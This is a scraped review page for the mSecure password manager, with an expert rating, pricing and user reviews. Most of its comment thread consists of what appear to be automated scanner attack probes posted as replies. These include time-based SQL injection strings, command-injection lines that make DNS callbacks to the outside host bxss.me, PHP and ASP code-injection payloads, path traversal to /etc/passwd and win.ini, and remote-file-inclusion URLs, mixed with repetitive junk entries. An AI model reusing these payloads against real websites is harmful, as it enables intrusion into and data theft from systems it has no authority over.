Professional Reviews
Ownership
Affiliate Commissions
Reviews Guidelines

mSecure Password Manager Review [2022]: Is it Any Good?

6.0
DECENT
Ranked 39th from 52 password managers
Katarina Glamoslija
Katarina Glamoslija
Published on: November 16, 2022

mSecure Review: Quick Expert Summary

mSecure is an alright password manager, but there are much better choices out there in almost every respect: Price, features, security, usability, etc.

If you’re looking for a good password manager, check out Dashlane or Keeper.

If you need more options, read about the best password managers in 2022.

mSecure Products & Pricing

Free
$0.00 / year
Premium
$19.99 / year
Bottom Line

mSecure is not bad, but it’s not particularly “good” either. There are a lot better options out there. I’d recommend Dashlane — it comes with a VPN, one-click password changer, and a great integration with every device and operating system.

About the Author

About the Author

Katarina is a tech enthusiast specializing in cybersecurity products, data protection, and maintaining strong practices for general online safety. When she's not a "Safety Detective", she likes to play with her two cats, binge watch crime dramas, sample fine wines, and read about the origins of the universe.

Password Managers Comparison

9.6
9.6
6.0
6.0
Check the top 3 alternative password managers
mSecure User Reviews

*User reviews are not verified

8 13
Based on 21 reviews in 2 languages 5.7
Language
You can trust the Community! Companies can't ask us to delete or change user reviews.
John
John
Portugal
10.0
Excellent Password Manager
iOS User
I like how customizable the data fields are in this app. I like that it works and syncs cross-platform. I use it on iOS, Mac, and Windows. I also like that this app doesn’t try to do everything like adding VPN service. I think others do that to try and justify their subscription price. I don’t like subscription models because if I don’t pay for whatever reason, I lose my passwords, so I prefer paying once. I might have to pay again for a new version in the future, but they give you a while before the old version isn’t supported.
Phil
Phil
Australia
10.0
no problems
Windows User
been using mSecure for a very long time now and never had any issues. always update to latest versions. and am very happy does everything I want and need.
Lee
Lee
United Kingdom
8.0
Works well on Mac OSX and iOS.
Mac User
I’ve had MSecure for over ten years a d upgraded a while ago to v5. It synchronizes to 5 devices and is easy to use. There may be programs with more features, however this does all I need.
Jk
Jk
United States
1.0
Msecure 5
Windows User
mSecure 5 will not reliably sync or recognize other computers on my network.
The people at mSecure have not been able to offer me an explanation for the problem or a solution.
The previous version, which I had for years, was far more reliable and worked much better.
I would not recommend this product.
Greg Myers
Greg Myers
United States
2.0
m4 to m5
Windows User
Trying to get passwords out of mSecure 4 to msecure5. It has been a nightmare and support is not helpful.
D K
D K
United States
7.0
Amended review
Mac User
Had msecure 4. Wouldnt work with upgraded ios. But then found i could download msecure 5.5 free and then put msecure 4 into msecure 5 and reaccess my passwords. But it wasn’t easy to find this out.
Thomas Green
Thomas Green
United States
1.0
Updating to version 5
Windows User
I have used version 4 for many years and have hundreds of passwords stored. After updating to IOS 14.5 I can no longer get into msecure because they stopped supporting version 4. The support staff is no help. They continue to send out a mass email type letter which doesn't address my problem. My problem is I used a thumb print to start msecure 4. That doesn't work to import version 4 data into version 5. After paying to download version 5 I will be asking for a refund. We'll see how that goes.
United States
8.0
Good app
Mac User
Been using this for many years and I’m not sure why others are negative. I find it easy to use and very handy. Upgraded to newer version and it works fine.
Fred
Fred
United States
2.0
Latest version of msecure is unusable
Windows User
I have been using msecure for over 12 years. Up through version 4, it was great. Then my wife's Mac went to 64 bit and needed v5. V5 is my opinion a disaster. Classic example of making a product idiot proof, so that its only useful for idiots.
Searching that took a few clicks now takes a few dozen. Things that used to be simple, like starting a new file, moving a file from one computer to another are virtually impossible. The windows version requires going through the Microsoft store, which is incompatible with my Windows install. The Android version lost the ability to expand just the 'A' passwords, then the 'B' etc. .
And the company is particularly unhelpful in addressing any of those issues.
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
xpmxvMAf Fred
Nov. 18, 2022
1
user avatar
Thomas Green Fred
I can't access my msecure 4 data after I updated to IOS 14.5. The msecure support "team" is not helping at all. I used to log into msecure with my thumb print. That doesn't work when trying to import the version 4 data into versio...Show More
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
@@oeYhw
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1'"
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
u31jlmCH')) OR 354=(SELECT 354 FROM PG_SLEEP(15))--
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
47cMKQxG') OR 555=(SELECT 555 FROM PG_SLEEP(15))--
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
nQ3nsRSQ' OR 177=(SELECT 177 FROM PG_SLEEP(15))--
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-1)) OR 429=(SELECT 429 FROM PG_SLEEP(15))--
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-5) OR 964=(SELECT 964 FROM PG_SLEEP(15))--
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
8Qzgf10P'; waitfor delay '0:0:15' --
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-5 OR 836=(SELECT 836 FROM PG_SLEEP(15))--
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1 waitfor delay '0:0:15' --
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-1); waitfor delay '0:0:15' --
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-1; waitfor delay '0:0:15' --
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-1" OR 2+45-45-1=0+0+0+1 --
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
if(now()=sysdate(),sleep(15),0)
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-1' OR 2+55-55-1=0+0+0+1 or '2EgVV78D'='
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-1' OR 2+358-358-1=0+0+0+1 --
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-1 OR 2+988-988-1=0+0+0+1 --
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
-1 OR 2+951-951-1=0+0+0+1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
q4YDtUkC
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
@@MB69J Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
-1" OR 2+26-26-1=0+0+0+1 -- Thomas Green
Nov. 18, 2022
1
user avatar
1'" Thomas Green
Nov. 18, 2022
1
user avatar
-1' OR 2+736-736-1=0+0+0+1 or 'shaswE96'=' Thomas Green
Nov. 18, 2022
1
user avatar
-1' OR 2+342-342-1=0+0+0+1 -- Thomas Green
Nov. 18, 2022
1
user avatar
-1 OR 2+684-684-1=0+0+0+1 -- Thomas Green
Nov. 18, 2022
1
user avatar
-1 OR 2+81-81-1=0+0+0+1 Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
;(nslookup hitsbxkepjyygcfab1.bxss.me||perl -e "gethostbyname('hitsbxkepjyygcfab1.bxss.me')")|(nslookup hitsbxkepjyygcfab1.bxss.me||perl -e "gethostbyname('hitsbxkepjyygcfab1.bxss.me')")&(nslookup hitsbxkepjyygcfab1.bxss.me||perl -e "gethostbyname('hitsbxkepjyygcfab1.bxss.me')")
user avatar
JETBO9gD Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
`(nslookup hitqldjeyqtib34e23.bxss.me||perl -e "gethostbyname('hitqldjeyqtib34e23.bxss.me')")`
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
|(nslookup hitpkvbhtqiup532e3.bxss.me||perl -e "gethostbyname('hitpkvbhtqiup532e3.bxss.me')")
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
&(nslookup hithqwsfrhsob6dab6.bxss.me||perl -e "gethostbyname('hithqwsfrhsob6dab6.bxss.me')")&'\"`0&(nslookup hithqwsfrhsob6dab6.bxss.me||perl -e "gethostbyname('hithqwsfrhsob6dab6.bxss.me')")&`'
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
'.print(md5(31337)).'
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
$(nslookup hitdjsfhnpkpi9fb60.bxss.me||perl -e "gethostbyname('hitdjsfhnpkpi9fb60.bxss.me')")
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
(nslookup hitdcwterezyf621a3.bxss.me||perl -e "gethostbyname('hitdcwterezyf621a3.bxss.me')")
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
${@print(md5(31337))}\
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
|echo vdwlgr$()\ mjruze\nz^xyu||a #' |echo vdwlgr$()\ mjruze\nz^xyu||a #|" |echo vdwlgr$()\ mjruze\nz^xyu||a #
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
../1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
${@print(md5(31337))}
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
&echo ftaxvp$()\ llmbzc\nz^xyu||a #' &echo ftaxvp$()\ llmbzc\nz^xyu||a #|" &echo ftaxvp$()\ llmbzc\nz^xyu||a #
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
";print(md5(31337));$a="
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
bxss.me
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
echo djufls$()\ dkhyir\nz^xyu||a #' &echo djufls$()\ dkhyir\nz^xyu||a #|" &echo djufls$()\ dkhyir\nz^xyu||a #
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
../../../../../../../../../../../../../../windows/win.ini
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
';print(md5(31337));$a='
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
http://bxss.me/t/fit.txt%3F.jpg
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
../../../../../../../../../../../../../../etc/passwd
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
"+response.write(9325772*9621899)+"
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
Http://bxss.me/t/fit.txt
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
'+response.write(9325772*9621899)+'
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1some_inexistent_file_with_long_name%00.jpg
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
'.print(md5(31337)).' Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
response.write(9325772*9621899)
user avatar
`(nslookup hittepitwanpuf3c95.bxss.me||perl -e "gethostbyname('hittepitwanpuf3c95.bxss.me')")` Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
user avatar
"+response.write(9264638*9812939)+" Thomas Green
Nov. 18, 2022
1
user avatar
${@print(md5(31337))} Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
".gethostbyname(lc("hitww"."wugdjvtgc34b1.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(81).chr(106).chr(86)."
user avatar
&(nslookup hitcieyhymoklad9d4.bxss.me||perl -e "gethostbyname('hitcieyhymoklad9d4.bxss.me')")&'\"`0&(nslookup hitcieyhymoklad9d4.bxss.me||perl -e "gethostbyname('hitcieyhymoklad9d4.bxss.me')")&`' Thomas Green
Nov. 18, 2022
1
user avatar
${@print(md5(31337))}\ Thomas Green
Nov. 18, 2022
1
user avatar
|(nslookup hitajaxqgtuawd2975.bxss.me||perl -e "gethostbyname('hitajaxqgtuawd2975.bxss.me')") Thomas Green
Nov. 18, 2022
1
user avatar
(nslookup hitpwpbfxdrtad5459.bxss.me||perl -e "gethostbyname('hitpwpbfxdrtad5459.bxss.me')") Thomas Green
Nov. 18, 2022
1
user avatar
../xpmxvMAf Thomas Green
Nov. 18, 2022
1
user avatar
";print(md5(31337));$a=" Thomas Green
Nov. 18, 2022
1
user avatar
http://bxss.me/t/fit.txt%3F.jpg Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
^(#$!@#$)(()))******
user avatar
$(nslookup hitnfgodosmpab4171.bxss.me||perl -e "gethostbyname('hitnfgodosmpab4171.bxss.me')") Thomas Green
Nov. 18, 2022
1
user avatar
bxss.me Thomas Green
Nov. 18, 2022
1
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
"+"A".concat(70-3).concat(22*4).concat(115).concat(81).concat(97).concat(87)+(require"socket"
Socket.gethostbyname("hitlv"+"bdhjcnqic70eb.bxss.me.")[3].to_s)+"
user avatar
xpmxvMAf Thomas Green
Nov. 18, 2022
Value and ease of use
iOS User
Been using MSecure for 10 years. Free with low cost cloud option. Fantastically clean and easy to use UI. SHA-256 encryption.
Write Review on mSecure
0.0/ 10.0
Please enter your email address to submit your review